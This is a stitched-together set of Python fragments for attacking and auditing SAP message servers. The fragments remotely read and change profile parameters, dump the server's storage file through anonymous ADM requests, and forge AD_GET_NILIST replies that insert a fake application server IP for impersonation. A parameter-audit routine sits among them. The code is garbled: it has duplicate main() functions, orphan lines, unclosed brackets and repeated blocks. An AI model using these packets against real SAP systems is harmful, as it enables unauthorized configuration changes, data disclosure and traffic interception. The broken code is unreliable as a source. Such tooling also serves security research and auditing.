def do_parameter_get(self, args):
""" Get parameter value. Options: <parameter name> """
parameter_name = args
# Send ADM AD_PROFILE request
adm = SAPMSAdmRecord(opcode=0x1, parameter=parameter_name)
p = self._build(0x04, 0x05, adm_records=[adm])
response = self.connection.sr(p)[SAPMS]
if response:
self._print("Parameter value: %s" % response.adm_records[0].parameter)
def do_parameter_set(self, args):
""" Set parameter value (requires monitor mode enabled).
Options: <parameter name> <parameter value> """
try:
parameter_name, parameter_value = args.split(" ", 2)
except ValueError:
self._error("Invalid parameters !")
return
# Send ADM AD_SHARED_PARAMETER request
adm = SAPMSAdmRecord(opcode=0x2e,
parameter="%s=%s" %
(parameter_name, parameter_value))
p = self._build(0x04, 0x05, adm_records=[adm])
response = self.connection.sr(p)[SAPMS]
if response:
if response.adm_records[0].errorno != 0:
self._error("Error changing the parameter !")
else:
self._print("Parameter %s set to %s !" %
(parameter_name, parameter_value))
def main():
options = parse_options()
if options.verbose:
logging.basicConfig(level=logging.DEBUG)
domain = ms_domain_values_inv[options.domain]
# Initiate the connection
conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host,
options.remote_port,
options.route_string,
base_cls=SAPMS)
print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port))
client_string = options.client
# Build MS_LOGIN_2 packet
p = SAPMS(flag=0x00, iflag=0x08, domain=domain, toname=client_string, fromname=client_string)
# Send MS_LOGIN_2 packet
print("[*] Sending login packet")
response = conn.sr(p)[SAPMS]
print("[*] Login performed, server string: %s" % response.fromname)
server_string = response.fromname
print("[*] Retrieving current value of parameter: %s" % options.param_name)
# Send ADM AD_PROFILE request
adm = SAPMSAdmRecord(opcode=0x1, parameter=options.param_name)
p = SAPMS(toname=server_string, fromname=client_string, version=4,
flag=0x04, iflag=0x05, domain=domain, adm_records=[adm])
print("[*] Sending packet")
response = conn.sr(p)[SAPMS]
if options.verbose:
print("[*] Response:")
response.show()
param_old_value = response.adm_records[0].parameter
print("[*] Parameter %s" % param_old_value)
# If a parameter change was requested, send an ADM AD_SHARED_PARAMETER request
if options.param_value:
print("[*] Changing parameter value from: %s to: %s" % (param_old_value,
options.param_value))
# Build the packet
adm = SAPMSAdmRecord(opcode=0x2e,
parameter="%s=%s" % (options.param_name,
options.param_value))
p = SAPMS(toname=server_string, fromname=client_string, version=4,
iflag=5, flag=4, domain=domain, adm_records=[adm])
# Send the packet
print("[*] Sending packet")
response = conn.sr(p)[SAPMS]
if options.verbose:
print("[*] Response:")
response.show()
if response.adm_records[0].errorno != 0:
print("[*] Error requesting parameter change (error number %d)" % response.adm_records[0].errorno)
else:
print("[*] Parameter changed for the current session !")
def main():
options = parse_options()
if options.verbose:
logging.basicConfig(level=logging.DEBUG)
# initiate the connection :
print("[*] Initiate connection to message server %s:%d" %
(options.remote_host, options.remote_port))
try:
conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host,
options.remote_port,
options.route_string,
base_cls=SAPMS)
except Exception as e:
print(e)
print(
"Error during MS connection. Is internal ms port %d reachable ?" %
options.remote_port)
else:
print("[*] Connected. I check parameters...")
client_string = options.client
# Send MS_LOGIN_2 packet
p = SAPMS(flag=0x00,
iflag=0x08,
toname=client_string,
fromname=client_string)
print("[*] Sending login packet:")
response = conn.sr(p)[SAPMS]
print("[*] Login OK, Server string: %s\n" % response.fromname)
server_string = response.fromname
try:
with open(options.file_param) as list_param:
for line in list_param.readlines():
line = line.strip()
# Check for comments or empty lines
if len(line) == 0 or line.startswith("#"):
continue
# Get parameters, check type and expected value
# param2c = the SAP parameter to check
# check_type = EQUAL, SUP, INF, REGEX, <none>
# value2c = the expect value for 'ok' status
(param2c, check_type, value2c) = line.split(':')
status = '[!]'
# create request
adm = SAPMSAdmRecord(opcode=0x1, parameter=param2c)
p = SAPMS(toname=server_string,
fromname=client_string,
version=4,
flag=0x04,
iflag=0x05,
adm_records=[adm])
# send request
respond = conn.sr(p)[SAPMS]
value = respond.adm_records[0].parameter.replace(
respond.adm_records[0].parameter.split('=')[0] + '=',
'')
# Verify if value match with expected value
if value == '':
value = 'NOT_EXIST'
status = '[ ]'
elif check_type == 'EQUAL':
if value.upper() == str(value2c).upper():
status = '[+]'
elif check_type == 'NOTEQUAL':
if value.upper() != str(value2c).upper():
status = '[+]'
elif check_type == 'REGEX':
if re.match(value2c.upper(),
value.upper()) and value2c != 'NOT_EXIST':
status = '[+]'
elif check_type == 'SUP':
if float(value) >= float(value2c):
status = '[+]'
elif check_type == 'INF':
if float(value) <= float(value2c):
status = '[+]'
else:
status = '[ ]'
# display result
print("%s %s = %s" % (status, param2c, value))
except IOError:
print("Error reading parameters file !")
exit(0)
except ValueError:
print("Invalid parameters file format or access denied!")
exit(0)
hwid=struct.pack("!I", os.getpid()))
# ADM STRG_TYPE_READALL_OFFSET_I
# will dump the content of the file:
# /usr/sap/SID/ASCS01/work/SID_msg_server_adtl_storage
p_adm_readall_i = SAPMS(
fromname=my_name,
toname=anon_name,
flag='MS_ADMIN',
iflag='MS_ADM_OPCODES',
key=null_key, # TODO: CHANGE THAT AT RUNTIME (previous key + 6)
adm_recno=1,
adm_records=[
SAPMSAdmRecord(opcode='AD_RZL_STRG',
rzl_strg_type='STRG_TYPE_READALL_OFFSET_I',
rzl_strg_name=' ',
rzl_strg_uptime=7353,
rzl_strg_delay=290,
rzl_strg_integer3=7353)
])
p_adm_readall_ofs = SAPMS(fromname=my_name,
toname=anon_name,
flag='MS_ADMIN',
iflag='MS_ADM_OPCODES',
key=null_key,
adm_recno=1,
adm_records=[
SAPMSAdmRecord(
opcode='AD_RZL_STRG',
rzl_strg_type='STRG_TYPE_READALL_OFFSET',
rzl_strg_name=' ')
fromname=anon_name,
flag=0,
iflag='MS_LOGOUT',
padd=0)
p_adm_readall_i = SAPMS(fromname=my_name,
toname=anon_name,
flag='MS_ADMIN',
iflag='MS_ADM_OPCODES',
key=null_key,
adm_recno=1,
adm_records=[
SAPMSAdmRecord(
opcode='AD_RZL_STRG',
rzl_strg_type='STRG_TYPE_READALL_OFFSET_I',
rzl_strg_name=' ',
rzl_strg_uptime=7353,
rzl_strg_delay=290,
rzl_strg_integer3=7353)
])
p_adm_readall_ofs = SAPMS(fromname=my_name,
toname=anon_name,
flag='MS_ADMIN',
iflag='MS_ADM_OPCODES',
key=null_key,
adm_recno=1,
adm_records=[
SAPMSAdmRecord(
opcode='AD_RZL_STRG',
rzl_strg_type='STRG_TYPE_READALL_OFFSET',
rzl_strg_name=' ')
def ms_adm_nilist(p, whos_asking):
print "[+] " + yellow(
"Generating AD_GET_NILIST_PORT answer for request with key",
bold=True) + " '%s'" % p.key.encode('hex')
fromname = str()
toname = str()
answer = 1
# extract info from key
foo, key_t, key_u, key_respid = struct.unpack('!BBHL', p.key)
fromname = my_name
toname = p.fromname
key = p.key
flag = 'MS_REPLY'
opcode_version = 5
adm_type = 'ADM_REPLY'
rec = ' ' * 100
recno = 0
records = None
r = SAPMS(toname=toname,
fromname=fromname,
key=key,
domain='ABAP',
flag=flag,
iflag='MS_SEND_NAME',
opcode='MS_DP_ADM',
opcode_version=p.opcode_version,
opcode_charset=p.opcode_charset,
dp_version=p.dp_version,
adm_recno=recno,
adm_type=adm_type,
adm_records=records)
###############################
# 745 KERNEL and sometime 742 #
###############################
# why "sometime" for 742?
# they have both programs, old "RSMONGWY_SEND_NILIST" and new "RGWMON_SEND_NILIST"
# they both use dp_version=13, but IP list format expected in the ADM layer is a
# bit different between both programs.
if p.dp_version == 13:
r.adm_recno = 4
if 'RSMONGWY_SEND_NILIST' in whos_asking:
r.adm_records = [
SAPMSAdmRecord(opcode='AD_SELFIDENT',
record=rec,
serial_number=0,
executed=answer),
SAPMSAdmRecord(opcode='AD_GET_NILIST',
record=ms_adm_build_old_ip_record("127.0.0.1"),
serial_number=0,
executed=answer),
SAPMSAdmRecord(opcode='AD_GET_NILIST',
record=ms_adm_build_old_ip_record("127.0.0.2"),
serial_number=1,
executed=answer),
SAPMSAdmRecord(opcode='AD_GET_NILIST',
record=ms_adm_build_old_ip_record(
fake_as["ip"]),
serial_number=2,
executed=answer)
]
else:
r.adm_records = [
SAPMSAdmRecord(opcode='AD_SELFIDENT',
record=rec,
serial_number=0,
executed=answer),
SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT',
record=ms_adm_build_ip_record("127.0.0.1"),
serial_number=0,
executed=answer),
SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT',
record=ms_adm_build_ip_record("127.0.0.2"),
serial_number=1,
executed=answer),
SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT',
record=ms_adm_build_ip_record(fake_as["ip"]),
serial_number=2,
executed=answer)
]
r.dp_info1 = SAPDPInfo1(
dp_req_len=452,
dp_req_prio='MEDIUM',
dp_type_from='BY_NAME',
dp_fromname=my_name,
dp_agent_type_from='DISP',
dp_worker_from_num=p.dp_info1.dp_worker_to_num,
dp_addr_from_t=p.dp_info1.dp_addr_from_t,
dp_addr_from_u=p.dp_info1.dp_addr_from_u,
dp_addr_from_m=0,
dp_respid_from=p.dp_info1.dp_respid_from,
dp_type_to='BY_NAME',
dp_toname=p.fromname,
dp_agent_type_to='WORKER',
dp_worker_type_to='DIA',
dp_worker_to_num=p.dp_info1.dp_worker_from_num,
dp_addr_to_t=p.dp_info1.dp_addr_from_t,
dp_addr_to_u=p.dp_info1.dp_addr_from_u,
dp_addr_to_m=p.dp_info1.dp_addr_from_m,
dp_respid_to=p.dp_info1.dp_respid_from,
dp_req_handler='REQ_HANDLER_ADM_RESP',
dp_blob_worker_from_num=p.dp_info1.dp_worker_from_num,
dp_blob_addr_from_t=p.dp_info1.dp_addr_from_t,
dp_blob_addr_from_u=p.dp_info1.dp_addr_from_u,
dp_blob_respid_from=p.dp_info1.dp_blob_respid_from,
dp_blob_dst=(' ' * 35).encode('UTF-16-BE'))
##############
# 720 KERNEL #
##############
# Here we use old IP list format
# and a much simpler DP layer
if p.dp_version == 11:
r.adm_recno = 4
r.adm_records = [
SAPMSAdmRecord(opcode='AD_SELFIDENT',
record=rec,
serial_number=0,
executed=answer),
SAPMSAdmRecord(opcode='AD_GET_NILIST',
record=ms_adm_build_old_ip_record("127.0.0.1"),
serial_number=0,
executed=answer),
SAPMSAdmRecord(opcode='AD_GET_NILIST',
record=ms_adm_build_old_ip_record("127.0.0.2"),
serial_number=1,
executed=answer),
SAPMSAdmRecord(opcode='AD_GET_NILIST',
record=ms_adm_build_old_ip_record(fake_as["ip"]),
serial_number=2,
executed=answer)
]
r.dp_info2 = SAPDPInfo2(dp_req_prio='MEDIUM',
dp_blob_14=p.dp_info2.dp_blob_14,
dp_name_to=p.fromname,
dp_addr_from_t=255,
dp_blob_09='\xff\xcc',
dp_blob_10='\x01\x00',
dp_addr_from_u=0,
dp_addr_from_m=0,
dp_addr_to_t=key_t,
dp_addr_to_u=key_u,
dp_addr_to_m=0,
dp_respid_to=key_respid,
dp_blob_19=1,
dp_blob_21=105)
##############
# 749 KERNEL #
##############
# That's use on latest kernel like S4HANA servers
if p.dp_version == 14:
r.adm_recno = 4
r.adm_records = [
SAPMSAdmRecord(opcode='AD_SELFIDENT',
record=rec,
serial_number=0,
executed=answer),
SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT',
record=ms_adm_build_ip_record("127.0.0.1"),
serial_number=0,
executed=answer),
SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT',
record=ms_adm_build_ip_record("127.0.0.2"),
serial_number=1,
executed=answer),
SAPMSAdmRecord(opcode='AD_GET_NILIST_PORT',
record=ms_adm_build_ip_record(fake_as["ip"]),
serial_number=2,
executed=answer)
]
r.dp_info3 = SAPDPInfo3(dp_req_len=348,
dp_req_prio='MEDIUM',
dp_type_from='BY_NAME',
dp_fromname=my_name,
dp_agent_type_from='DISP',
dp_worker_from_num=p.dp_info3.dp_worker_to_num,
dp_addr_from_t=p.dp_info3.dp_addr_from_t,
dp_addr_from_u=p.dp_info3.dp_addr_from_u,
dp_addr_from_m=0,
dp_respid_from=p.dp_info3.dp_respid_from,
dp_type_to='BY_NAME',
dp_toname=p.fromname,
dp_agent_type_to='WORKER',
dp_worker_type_to='DIA',
dp_worker_to_num=p.dp_info3.dp_worker_from_num,
dp_addr_to_t=p.dp_info3.dp_addr_from_t,
dp_addr_to_u=p.dp_info3.dp_addr_from_u,
dp_respid_to=p.dp_info3.dp_respid_from,
dp_padd25=1,
dp_req_handler='REQ_HANDLER_ADM_RESP',
dp_padd29=p.dp_info3.dp_padd29,
dp_padd30=p.dp_info3.dp_padd30,
dp_padd31=p.dp_info3.dp_padd31,
dp_padd32=p.dp_info3.dp_padd32)
open("/tmp/dp.bin", "wb").write(str(SAPNI() / r))
return r